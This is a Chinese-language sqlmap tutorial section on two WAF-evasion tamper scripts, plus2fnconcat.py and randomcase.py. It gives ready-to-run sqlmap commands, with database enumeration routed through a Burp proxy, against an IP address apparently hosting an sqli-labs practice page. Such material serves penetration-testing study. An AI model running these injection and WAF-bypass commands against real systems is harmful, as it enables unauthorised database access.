sqlmap从入门到精通-第七章-7-16 绕过WAF脚本-plus2fnconcat.py&randomcase.py

33. plus2fnconcat.py脚本

使用fn concat函数用来替代加号，适用于微软的数据库SQL Server 2008以上

实战演示：

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="plus2fnconcat.py" --proxy="http://127.0.0.1:8080" -batch

 

可以看到是可以注入的，看看burp抓包情况

 ==================================================================================================================================================

34. randomcase.py脚本

随机转换每个关键字字符的大小写。将测试的payload随机大小写，可以用于大小写绕过的情况，适用于所有数据库

实战演示：

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="randomcase.py" --proxy="http://127.0.0.1:8080" -batch

可以进行注入，burp抓包效果看看

发现也确认进行了随机大小写转换